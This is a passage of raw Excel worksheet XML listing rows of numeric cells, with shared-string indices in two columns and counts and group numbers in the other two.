        <v>454</v>
      </c>
    </row>
    <row r="735" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A735" t="s">
        <v>16229</v>
      </c>
      <c r="B735" t="s">
        <v>16219</v>
      </c>
      <c r="C735">
        <v>0</v>
      </c>
      <c r="D735">
        <v>454</v>
      </c>
    </row>
    <row r="736" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A736" t="s">
        <v>16230</v>
      </c>
      <c r="B736" t="s">
        <v>16220</v>
      </c>
      <c r="C736">
        <v>0</v>
      </c>
      <c r="D736">
        <v>454</v>
      </c>
    </row>
    <row r="737" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A737" t="s">
        <v>16229</v>
      </c>
      <c r="B737" t="s">
        <v>16221</v>
      </c>
      <c r="C737">
        <v>5</v>
      </c>
      <c r="D737">
        <v>454</v>
      </c>
    </row>
    <row r="738" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A738" t="s">
        <v>16230</v>
      </c>
      <c r="B738" t="s">
        <v>16222</v>
      </c>
      <c r="C738">
        <v>6</v>
      </c>
      <c r="D738">
        <v>454</v>
      </c>
    </row>
    <row r="739" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A739" t="s">
        <v>16223</v>
      </c>
      <c r="B739" t="s">
        <v>16223</v>
      </c>
      <c r="C739">
        <v>6</v>
      </c>
      <c r="D739">
        <v>454</v>
      </c>
    </row>
    <row r="740" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A740" t="s">
        <v>16224</v>
      </c>
      <c r="B740" t="s">
        <v>16224</v>
      </c>
      <c r="C740">
        <v>1</v>
      </c>
      <c r="D740">
        <v>454</v>
      </c>
    </row>
    <row r="741" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A741" t="s">
        <v>16228</v>
      </c>
      <c r="B741" t="s">
        <v>16211</v>
      </c>
      <c r="C741">
        <v>0</v>
      </c>
      <c r="D741">
        <v>360</v>
      </c>
    </row>
    <row r="742" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A742" t="s">
        <v>16231</v>
      </c>
      <c r="B742" t="s">
        <v>16212</v>
      </c>
      <c r="C742">
        <v>0</v>
      </c>
      <c r="D742">
        <v>360</v>
      </c>
    </row>
    <row r="743" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A743" t="s">
        <v>16228</v>
      </c>
      <c r="B743" t="s">
        <v>16213</v>
      </c>
      <c r="C743">
        <v>0</v>
      </c>
      <c r="D743">
        <v>360</v>
      </c>
    </row>
    <row r="744" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A744" t="s">
        <v>16231</v>
      </c>
      <c r="B744" t="s">
        <v>16214</v>
      </c>
      <c r="C744">
        <v>0</v>
      </c>
      <c r="D744">
        <v>360</v>
      </c>
    </row>
    <row r="745" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A745" t="s">
        <v>16228</v>
      </c>
      <c r="B745" t="s">
        <v>16215</v>
      </c>
      <c r="C745">
        <v>5</v>
      </c>
      <c r="D745">
        <v>360</v>
      </c>
    </row>
    <row r="746" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A746" t="s">
        <v>16231</v>
      </c>
      <c r="B746" t="s">
        <v>16216</v>
      </c>
      <c r="C746">
        <v>8</v>
      </c>
      <c r="D746">
        <v>360</v>
      </c>
    </row>
    <row r="747" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A747" t="s">
        <v>16228</v>
      </c>
      <c r="B747" t="s">
        <v>16217</v>
      </c>
      <c r="C747">
        <v>4</v>
      </c>
      <c r="D747">
        <v>360</v>
      </c>
    </row>
    <row r="748" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A748" t="s">
        <v>16231</v>
      </c>
      <c r="B748" t="s">
        <v>16218</v>
      </c>
      <c r="C748">
        <v>6</v>
      </c>
      <c r="D748">
        <v>360</v>
      </c>
    </row>
    <row r="749" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A749" t="s">
        <v>16229</v>
      </c>
      <c r="B749" t="s">
        <v>16219</v>
      </c>
      <c r="C749">
        <v>0</v>
      </c>
      <c r="D749">
        <v>360</v>
      </c>
    </row>
    <row r="750" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A750" t="s">
        <v>16230</v>
      </c>
      <c r="B750" t="s">
        <v>16220</v>
      </c>
      <c r="C750">
        <v>0</v>
      </c>
      <c r="D750">
        <v>360</v>
      </c>
    </row>
    <row r="751" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A751" t="s">
        <v>16229</v>
      </c>
      <c r="B751" t="s">
        <v>16221</v>
      </c>
      <c r="C751">
        <v>35</v>
      </c>
      <c r="D751">
        <v>360</v>
      </c>
    </row>
    <row r="752" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A752" t="s">
        <v>16230</v>
      </c>
      <c r="B752" t="s">
        <v>16222</v>
      </c>
      <c r="C752">
        <v>5</v>
      </c>
      <c r="D752">
        <v>360</v>
      </c>
    </row>
    <row r="753" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A753" t="s">
        <v>16223</v>
      </c>
      <c r="B753" t="s">
        <v>16223</v>
      </c>
      <c r="C753">
        <v>26</v>
      </c>
      <c r="D753">
        <v>360</v>
      </c>
    </row>
    <row r="754" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A754" t="s">
        <v>16224</v>
      </c>
      <c r="B754" t="s">
        <v>16224</v>
      </c>
      <c r="C754">
        <v>0</v>
      </c>
      <c r="D754">
        <v>360</v>
      </c>
    </row>
    <row r="755" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A755" t="s">
        <v>16228</v>
      </c>
      <c r="B755" t="s">
        <v>16211</v>
      </c>
      <c r="C755">
        <v>0</v>
      </c>
      <c r="D755">
        <v>2362</v>
      </c>
    </row>
    <row r="756" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A756" t="s">
        <v>16231</v>
      </c>
      <c r="B756" t="s">
        <v>16212</v>
      </c>
      <c r="C756">
        <v>0</v>
      </c>
      <c r="D756">
        <v>2362</v>
      </c>
    </row>
    <row r="757" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A757" t="s">
        <v>16228</v>
      </c>
      <c r="B757" t="s">
        <v>16213</v>
      </c>
      <c r="C757">
        <v>0</v>
      </c>
      <c r="D757">
        <v>2362</v>
      </c>
    </row>
    <row r="758" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A758" t="s">
        <v>16231</v>
      </c>
      <c r="B758" t="s">
        <v>16214</v>
      </c>
      <c r="C758">
        <v>0</v>
      </c>
      <c r="D758">
        <v>2362</v>
      </c>
    </row>
    <row r="759" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A759" t="s">
        <v>16228</v>
      </c>
      <c r="B759" t="s">
        <v>16215</v>
      </c>
      <c r="C759">
        <v>0</v>
      </c>
      <c r="D759">
        <v>2362</v>
      </c>
    </row>
    <row r="760" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A760" t="s">
        <v>16231</v>
      </c>
      <c r="B760" t="s">
        <v>16216</v>
      </c>
      <c r="C760">
        <v>2</v>
      </c>
      <c r="D760">
        <v>2362</v>
      </c>
    </row>
    <row r="761" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A761" t="s">
        <v>16228</v>
      </c>
      <c r="B761" t="s">
        <v>16217</v>
      </c>
      <c r="C761">
        <v>2</v>
      </c>
      <c r="D761">
        <v>2362</v>
      </c>
    </row>
    <row r="762" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A762" t="s">
        <v>16231</v>
      </c>
      <c r="B762" t="s">
        <v>16218</v>
      </c>
      <c r="C762">
        <v>1</v>
      </c>
      <c r="D762">
        <v>2362</v>
      </c>
    </row>
    <row r="763" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A763" t="s">
        <v>16229</v>
      </c>
      <c r="B763" t="s">
        <v>16219</v>
      </c>
      <c r="C763">
        <v>0</v>
      </c>
      <c r="D763">
        <v>2362</v>
      </c>
    </row>
    <row r="764" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A764" t="s">
        <v>16230</v>
      </c>
      <c r="B764" t="s">
        <v>16220</v>
      </c>
      <c r="C764">
        <v>2</v>
      </c>
      <c r="D764">
        <v>2362</v>
      </c>
    </row>
    <row r="765" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A765" t="s">
        <v>16229</v>
      </c>
      <c r="B765" t="s">
        <v>16221</v>
      </c>
      <c r="C765">
        <v>4</v>
      </c>
      <c r="D765">
        <v>2362</v>
      </c>
    </row>
    <row r="766" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A766" t="s">
        <v>16230</v>
      </c>
      <c r="B766" t="s">
        <v>16222</v>
      </c>
      <c r="C766">
        <v>19</v>
      </c>
      <c r="D766">
        <v>2362</v>
      </c>
    </row>
    <row r="767" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A767" t="s">
        <v>16223</v>
      </c>
      <c r="B767" t="s">
        <v>16223</v>
      </c>
      <c r="C767">
        <v>26</v>
      </c>
      <c r="D767">
        <v>2362</v>
      </c>
    </row>
    <row r="768" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A768" t="s">
        <v>16224</v>
      </c>
      <c r="B768" t="s">
        <v>16224</v>
      </c>
      <c r="C768">
        <v>1</v>
      </c>
      <c r="D768">
        <v>2362</v>
      </c>
    </row>
    <row r="769" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A769" t="s">
        <v>16228</v>
      </c>
      <c r="B769" t="s">
        <v>16211</v>
      </c>
      <c r="C769">
        <v>0</v>
      </c>
      <c r="D769">
        <v>2344</v>
      </c>
    </row>
    <row r="770" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A770" t="s">
        <v>16231</v>
      </c>
      <c r="B770" t="s">
        <v>16212</v>
      </c>
      <c r="C770">
        <v>0</v>
      </c>
      <c r="D770">
        <v>2344</v>
      </c>
    </row>
    <row r="771" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A771" t="s">
        <v>16228</v>
      </c>
      <c r="B771" t="s">
        <v>16213</v>
      </c>
      <c r="C771">
        <v>0</v>
      </c>
      <c r="D771">
        <v>2344</v>
      </c>
    </row>
    <row r="772" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A772" t="s">
        <v>16231</v>
      </c>
      <c r="B772" t="s">
        <v>16214</v>
      </c>
      <c r="C772">
        <v>0</v>
      </c>
      <c r="D772">
        <v>2344</v>
      </c>
    </row>
    <row r="773" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A773" t="s">
        <v>16228</v>
      </c>
      <c r="B773" t="s">
        <v>16215</v>
      </c>
      <c r="C773">
        <v>1</v>
      </c>
      <c r="D773">
        <v>2344</v>
      </c>
    </row>
    <row r="774" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A774" t="s">
        <v>16231</v>
      </c>
      <c r="B774" t="s">
        <v>16216</v>
      </c>
      <c r="C774">
        <v>2</v>
      </c>
      <c r="D774">
        <v>2344</v>
      </c>
    </row>
    <row r="775" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A775" t="s">
        <v>16228</v>
      </c>
      <c r="B775" t="s">
        <v>16217</v>
      </c>
      <c r="C775">
        <v>1</v>
      </c>
      <c r="D775">
        <v>2344</v>
      </c>
    </row>
    <row r="776" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A776" t="s">
        <v>16231</v>
      </c>
      <c r="B776" t="s">
        <v>16218</v>
      </c>
      <c r="C776">
        <v>1</v>
      </c>
      <c r="D776">
        <v>2344</v>
      </c>
    </row>
    <row r="777" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A777" t="s">
        <v>16229</v>
      </c>
      <c r="B777" t="s">
        <v>16219</v>
      </c>
      <c r="C777">
        <v>0</v>
      </c>
      <c r="D777">
        <v>2344</v>
      </c>
    </row>
    <row r="778" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A778" t="s">
        <v>16230</v>
      </c>
      <c r="B778" t="s">
        <v>16220</v>
      </c>
      <c r="C778">
        <v>0</v>
      </c>
      <c r="D778">
        <v>2344</v>
      </c>
    </row>
    <row r="779" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A779" t="s">
        <v>16229</v>
      </c>
      <c r="B779" t="s">
        <v>16221</v>
      </c>
      <c r="C779">
        <v>10</v>
      </c>
      <c r="D779">
        <v>2344</v>
      </c>
    </row>
    <row r="780" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A780" t="s">
        <v>16230</v>
      </c>
      <c r="B780" t="s">
        <v>16222</v>
      </c>
      <c r="C780">
        <v>10</v>
      </c>
      <c r="D780">
        <v>2344</v>
      </c>
    </row>
    <row r="781" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A781" t="s">
        <v>16223</v>
      </c>
      <c r="B781" t="s">
        <v>16223</v>
      </c>
      <c r="C781">
        <v>0</v>
      </c>
      <c r="D781">
        <v>2344</v>
      </c>
    </row>
    <row r="782" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A782" t="s">
        <v>16224</v>
      </c>
      <c r="B782" t="s">
        <v>16224</v>
      </c>
      <c r="C782">
        <v>0</v>
      </c>
      <c r="D782">
        <v>2344</v>
      </c>
    </row>
    <row r="783" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A783" t="s">
        <v>16228</v>
      </c>
      <c r="B783" t="s">
        <v>16211</v>
      </c>
      <c r="C783">
        <v>0</v>
      </c>
      <c r="D783">
        <v>766</v>
      </c>
    </row>
    <row r="784" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A784" t="s">
        <v>16231</v>
      </c>
      <c r="B784" t="s">
        <v>16212</v>
      </c>
      <c r="C784">
        <v>0</v>
      </c>
      <c r="D784">
        <v>766</v>
      </c>
    </row>
    <row r="785" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A785" t="s">
        <v>16228</v>
      </c>
      <c r="B785" t="s">
        <v>16213</v>
      </c>
      <c r="C785">
        <v>0</v>
      </c>
      <c r="D785">
        <v>766</v>
      </c>
    </row>
    <row r="786" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A786" t="s">
        <v>16231</v>
      </c>
      <c r="B786" t="s">
        <v>16214</v>
      </c>
      <c r="C786">
        <v>1</v>
      </c>
      <c r="D786">
        <v>766</v>
      </c>
    </row>
    <row r="787" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A787" t="s">
        <v>16228</v>
      </c>
      <c r="B787" t="s">
        <v>16215</v>
      </c>
      <c r="C787">
        <v>7</v>
      </c>
      <c r="D787">
        <v>766</v>
      </c>
    </row>
    <row r="788" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A788" t="s">
        <v>16231</v>
      </c>
      <c r="B788" t="s">
        <v>16216</v>
      </c>
      <c r="C788">
        <v>5</v>
      </c>
      <c r="D788">
        <v>766</v>
      </c>
    </row>
    <row r="789" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A789" t="s">
        <v>16228</v>
      </c>
      <c r="B789" t="s">
        <v>16217</v>
      </c>
      <c r="C789">
        <v>6</v>
      </c>
      <c r="D789">
        <v>766</v>
      </c>
    </row>
    <row r="790" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A790" t="s">
        <v>16231</v>
      </c>
      <c r="B790" t="s">
        <v>16218</v>
      </c>
      <c r="C790">
        <v>4</v>
      </c>
      <c r="D790">
        <v>766</v>
      </c>
    </row>
    <row r="791" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A791" t="s">
        <v>16229</v>
      </c>
      <c r="B791" t="s">
        <v>16219</v>
      </c>
      <c r="C791">
        <v>0</v>
      </c>
      <c r="D791">
        <v>766</v>
      </c>
    </row>
    <row r="792" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A792" t="s">
        <v>16230</v>
      </c>
      <c r="B792" t="s">
        <v>16220</v>
      </c>
      <c r="C792">
        <v>4</v>
      </c>
      <c r="D792">
        <v>766</v>
      </c>
    </row>
    <row r="793" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A793" t="s">
        <v>16229</v>
      </c>
      <c r="B793" t="s">
        <v>16221</v>
      </c>
      <c r="C793">
        <v>50</v>
      </c>
      <c r="D793">
        <v>766</v>
      </c>
    </row>
    <row r="794" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A794" t="s">
        <v>16230</v>
      </c>
      <c r="B794" t="s">
        <v>16222</v>
      </c>
      <c r="C794">
        <v>200</v>
      </c>
      <c r="D794">
        <v>766</v>
      </c>
    </row>
    <row r="795" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A795" t="s">
        <v>16223</v>
      </c>
      <c r="B795" t="s">
        <v>16223</v>
      </c>
      <c r="C795">
        <v>25</v>
      </c>
      <c r="D795">
        <v>766</v>
      </c>
    </row>
    <row r="796" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A796" t="s">
        <v>16224</v>
      </c>
      <c r="B796" t="s">
        <v>16224</v>
      </c>
      <c r="C796">
        <v>0</v>
      </c>
      <c r="D796">
        <v>766</v>
      </c>
    </row>
    <row r="797" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A797" t="s">
        <v>16228</v>
      </c>
      <c r="B797" t="s">
        <v>16211</v>
      </c>
      <c r="C797">
        <v>0</v>
      </c>
      <c r="D797">
        <v>465</v>
      </c>
    </row>
    <row r="798" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A798" t="s">
        <v>16231</v>
      </c>
      <c r="B798" t="s">
        <v>16212</v>
      </c>
      <c r="C798">
        <v>0</v>
      </c>
      <c r="D798">
        <v>465</v>
      </c>
    </row>
    <row r="799" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A799" t="s">
        <v>16228</v>
      </c>
      <c r="B799" t="s">
        <v>16213</v>
      </c>
      <c r="C799">
        <v>0</v>
      </c>
      <c r="D799">
        <v>465</v>
      </c>
    </row>
    <row r="800" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A800" t="s">
        <v>16231</v>
      </c>
      <c r="B800" t="s">
        <v>16214</v>
      </c>
      <c r="C800">
        <v>0</v>
      </c>
      <c r="D800">
        <v>465</v>
      </c>
    </row>
    <row r="801" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A801" t="s">
        <v>16228</v>
      </c>
      <c r="B801" t="s">
        <v>16215</v>
      </c>
      <c r="C801">
        <v>3</v>
      </c>
      <c r="D801">
        <v>465</v>
      </c>
    </row>
    <row r="802" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A802" t="s">
        <v>16231</v>
      </c>
      <c r="B802" t="s">
        <v>16216</v>
      </c>
      <c r="C802">
        <v>5</v>
      </c>
      <c r="D802">
        <v>465</v>
      </c>
    </row>
    <row r="803" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A803" t="s">
        <v>16228</v>
      </c>
      <c r="B803" t="s">
        <v>16217</v>
      </c>
      <c r="C803">
        <v>5</v>
      </c>
      <c r="D803">
        <v>465</v>
      </c>
    </row>
    <row r="804" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A804" t="s">
        <v>16231</v>
      </c>
      <c r="B804" t="s">
        <v>16218</v>
      </c>
      <c r="C804">
        <v>12</v>
      </c>
      <c r="D804">
        <v>465</v>
      </c>
    </row>
    <row r="805" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A805" t="s">
        <v>16229</v>
      </c>
      <c r="B805" t="s">
        <v>16219</v>
      </c>
      <c r="C805">
        <v>0</v>
      </c>
      <c r="D805">
        <v>465</v>
      </c>
    </row>
    <row r="806" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A806" t="s">
        <v>16230</v>
      </c>
      <c r="B806" t="s">
        <v>16220</v>
      </c>
      <c r="C806">
        <v>0</v>
      </c>
      <c r="D806">
        <v>465</v>
      </c>
    </row>
    <row r="807" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A807" t="s">
        <v>16229</v>
      </c>
      <c r="B807" t="s">
        <v>16221</v>
      </c>
      <c r="C807">
        <v>15</v>
      </c>
      <c r="D807">
        <v>465</v>
      </c>
    </row>
    <row r="808" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A808" t="s">
        <v>16230</v>
      </c>
      <c r="B808" t="s">
        <v>16222</v>
      </c>
      <c r="C808">
        <v>110</v>
      </c>
      <c r="D808">
        <v>465</v>
      </c>
    </row>
    <row r="809" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A809" t="s">
        <v>16223</v>
      </c>
      <c r="B809" t="s">
        <v>16223</v>
      </c>
      <c r="C809">
        <v>26</v>
      </c>
      <c r="D809">
        <v>465</v>
      </c>
    </row>
    <row r="810" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A810" t="s">
        <v>16224</v>
      </c>
      <c r="B810" t="s">
        <v>16224</v>
      </c>
      <c r="C810">
        <v>1</v>
      </c>
      <c r="D810">
        <v>465</v>
      </c>
    </row>
    <row r="811" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A811" t="s">
        <v>16228</v>
      </c>
      <c r="B811" t="s">
        <v>16211</v>
      </c>
      <c r="C811">
        <v>0</v>
      </c>
      <c r="D811">
        <v>1183</v>
      </c>
    </row>
    <row r="812" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A812" t="s">
        <v>16231</v>
      </c>
      <c r="B812" t="s">
        <v>16212</v>
      </c>
      <c r="C812">
        <v>3</v>
      </c>
      <c r="D812">
        <v>1183</v>
      </c>
    </row>
    <row r="813" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A813" t="s">
        <v>16228</v>
      </c>
      <c r="B813" t="s">
        <v>16213</v>
      </c>
      <c r="C813">
        <v>6</v>
      </c>
      <c r="D813">
        <v>1183</v>
      </c>
    </row>
    <row r="814" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A814" t="s">
        <v>16231</v>
      </c>
      <c r="B814" t="s">
        <v>16214</v>
      </c>
      <c r="C814">
        <v>3</v>
      </c>
      <c r="D814">
        <v>1183</v>
      </c>
    </row>
    <row r="815" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A815" t="s">
        <v>16228</v>
      </c>
      <c r="B815" t="s">
        <v>16215</v>
      </c>
      <c r="C815">
        <v>1</v>
      </c>
      <c r="D815">
        <v>1183</v>
      </c>
    </row>
    <row r="816" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A816" t="s">
        <v>16231</v>
      </c>
      <c r="B816" t="s">
        <v>16216</v>
      </c>
      <c r="C816">
        <v>3</v>
      </c>
      <c r="D816">
        <v>1183</v>
      </c>
    </row>
    <row r="817" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A817" t="s">
        <v>16228</v>
      </c>
      <c r="B817" t="s">
        <v>16217</v>
      </c>
      <c r="C817">
        <v>0</v>
      </c>
      <c r="D817">
        <v>1183</v>
      </c>
    </row>
    <row r="818" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A818" t="s">
        <v>16231</v>
      </c>
      <c r="B818" t="s">
        <v>16218</v>
      </c>
      <c r="C818">
        <v>0</v>
      </c>
      <c r="D818">
        <v>1183</v>
      </c>
    </row>
    <row r="819" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A819" t="s">
        <v>16229</v>
      </c>
      <c r="B819" t="s">
        <v>16219</v>
      </c>
      <c r="C819">
        <v>0</v>
      </c>
      <c r="D819">
        <v>1183</v>
      </c>
    </row>
    <row r="820" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A820" t="s">
        <v>16230</v>
      </c>
      <c r="B820" t="s">
        <v>16220</v>
      </c>
      <c r="C820">
        <v>2</v>
      </c>
      <c r="D820">
        <v>1183</v>
      </c>
    </row>
    <row r="821" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A821" t="s">
        <v>16229</v>
      </c>
      <c r="B821" t="s">
        <v>16221</v>
      </c>
      <c r="C821">
        <v>6</v>
      </c>
      <c r="D821">
        <v>1183</v>
      </c>
    </row>
    <row r="822" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A822" t="s">
        <v>16230</v>
      </c>
      <c r="B822" t="s">
        <v>16222</v>
      </c>
      <c r="C822">
        <v>1</v>
      </c>
      <c r="D822">
        <v>1183</v>
      </c>
    </row>
    <row r="823" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A823" t="s">
        <v>16223</v>
      </c>
      <c r="B823" t="s">
        <v>16223</v>
      </c>
      <c r="C823">
        <v>25</v>
      </c>
      <c r="D823">
        <v>1183</v>
      </c>
    </row>
    <row r="824" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A824" t="s">
        <v>16224</v>
      </c>
      <c r="B824" t="s">
        <v>16224</v>
      </c>
      <c r="C824">
        <v>1</v>
      </c>
      <c r="D824">
        <v>1183</v>
      </c>
    </row>
    <row r="825" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A825" t="s">
        <v>16228</v>
      </c>
      <c r="B825" t="s">
        <v>16211</v>
      </c>
      <c r="C825">
        <v>0</v>
      </c>
      <c r="D825">
        <v>1691</v>
      </c>
    </row>
    <row r="826" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A826" t="s">
        <v>16231</v>
      </c>
      <c r="B826" t="s">
        <v>16212</v>
      </c>
      <c r="C826">
        <v>0</v>
      </c>
      <c r="D826">
        <v>1691</v>
      </c>
    </row>
    <row r="827" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A827" t="s">
        <v>16228</v>
      </c>
      <c r="B827" t="s">
        <v>16213</v>
      </c>
      <c r="C827">
        <v>0</v>
      </c>
      <c r="D827">
        <v>1691</v>
      </c>
    </row>
    <row r="828" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A828" t="s">
        <v>16231</v>
      </c>
      <c r="B828" t="s">
        <v>16214</v>
      </c>
      <c r="C828">
        <v>0</v>
      </c>
      <c r="D828">
        <v>1691</v>
      </c>
    </row>
    <row r="829" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A829" t="s">
        <v>16228</v>
      </c>
      <c r="B829" t="s">
        <v>16215</v>
      </c>
      <c r="C829">
        <v>0</v>
      </c>
      <c r="D829">
        <v>1691</v>
      </c>
    </row>
    <row r="830" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A830" t="s">
        <v>16231</v>
      </c>
      <c r="B830" t="s">
        <v>16216</v>
      </c>
      <c r="C830">
        <v>1</v>
      </c>
      <c r="D830">
        <v>1691</v>
      </c>
    </row>
    <row r="831" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A831" t="s">
        <v>16228</v>
      </c>
      <c r="B831" t="s">
        <v>16217</v>
      </c>
      <c r="C831">
        <v>7</v>
      </c>
      <c r="D831">
        <v>1691</v>
      </c>
    </row>
    <row r="832" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A832" t="s">
        <v>16231</v>
      </c>
      <c r="B832" t="s">
        <v>16218</v>
      </c>
      <c r="C832">
        <v>0</v>
      </c>
      <c r="D832">
        <v>1691</v>
      </c>
    </row>
    <row r="833" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A833" t="s">
        <v>16229</v>
      </c>
      <c r="B833" t="s">
        <v>16219</v>
      </c>
      <c r="C833">
        <v>0</v>
      </c>
      <c r="D833">
        <v>1691</v>
      </c>
    </row>
    <row r="834" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A834" t="s">
        <v>16230</v>
      </c>
      <c r="B834" t="s">
        <v>16220</v>
      </c>
      <c r="C834">
        <v>0</v>
      </c>
      <c r="D834">
        <v>1691</v>
      </c>
    </row>
    <row r="835" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A835" t="s">
        <v>16229</v>
      </c>
      <c r="B835" t="s">
        <v>16221</v>
      </c>
      <c r="C835">
        <v>4</v>
      </c>
      <c r="D835">
        <v>1691</v>
      </c>
    </row>
    <row r="836" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A836" t="s">
        <v>16230</v>
      </c>
      <c r="B836" t="s">
        <v>16222</v>
      </c>
      <c r="C836">
        <v>4</v>
      </c>
      <c r="D836">
        <v>1691</v>
      </c>
    </row>
    <row r="837" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A837" t="s">
        <v>16223</v>
      </c>
      <c r="B837" t="s">
        <v>16223</v>
      </c>
      <c r="C837">
        <v>26</v>
      </c>
      <c r="D837">
        <v>1691</v>
      </c>
    </row>
    <row r="838" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A838" t="s">
        <v>16224</v>
      </c>
      <c r="B838" t="s">
        <v>16224</v>
      </c>
      <c r="C838">
        <v>2</v>
      </c>
      <c r="D838">
        <v>1691</v>
      </c>
    </row>
    <row r="839" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A839" t="s">
        <v>16228</v>
      </c>
      <c r="B839" t="s">
        <v>16211</v>
      </c>
      <c r="C839">
        <v>2</v>
      </c>
      <c r="D839">
        <v>2246</v>
      </c>
    </row>
    <row r="840" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A840" t="s">
        <v>16231</v>
      </c>
      <c r="B840" t="s">
        <v>16212</v>
      </c>
      <c r="C840">
        <v>0</v>
      </c>
      <c r="D840">
        <v>2246</v>
      </c>
    </row>
    <row r="841" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A841" t="s">
        <v>16228</v>
      </c>
      <c r="B841" t="s">
        <v>16213</v>
      </c>
      <c r="C841">
        <v>5</v>
      </c>
      <c r="D841">
        <v>2246</v>
      </c>
    </row>
    <row r="842" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A842" t="s">
        <v>16231</v>
      </c>
      <c r="B842" t="s">
        <v>16214</v>
      </c>
      <c r="C842">
        <v>0</v>
      </c>
      <c r="D842">
        <v>2246</v>
      </c>
    </row>
    <row r="843" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A843" t="s">
        <v>16228</v>
      </c>
      <c r="B843" t="s">
        <v>16215</v>
      </c>
      <c r="C843">
        <v>0</v>
      </c>
      <c r="D843">
